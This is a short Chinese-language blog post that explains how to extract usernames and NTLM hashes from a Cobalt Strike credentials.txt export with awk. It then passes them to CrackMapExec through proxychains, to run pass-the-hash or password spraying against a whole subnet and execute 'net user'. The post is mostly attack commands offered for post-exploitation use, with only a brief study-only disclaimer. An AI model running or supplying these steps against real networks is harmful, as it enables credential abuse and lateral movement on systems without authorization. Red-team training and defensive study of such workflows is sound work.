cobaltstrike credentials凭证解析提取

发布于 2022-03-03 / 默认分类 / 0 条评论 / 6546 浏览

本站的所有程序和文章，仅限用于学习和研究目的；不得用于商业或者非法用途，否则，一切后果请用户自负！！

前言

小记用命令直接提取cs里面导出来credentials.txt，方便进一步进行pth或者密码喷洒。

注意需要把顶部的注释删除，如果凭证是包含明文的，需要手动处理一下。

提取用户名

awk -F":::" '{print $1}' credentials.txt | awk -F"\\" '{print $2}'

提取hash

awk -F":::" '{print $2}' credentials.txt

提取完就可以cme批量了

proxychains4 ./cme smb 10.0.0.1/24 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 -d xx.org -x "net user"

本文最后编辑时间为: 2022-03-03

本文由 safe6 创作,著作权归作者所有，任何形式的转载都请联系作者获得授权并注明出处。

如本文对你有帮助，点击广告支持一下吧，创造不易。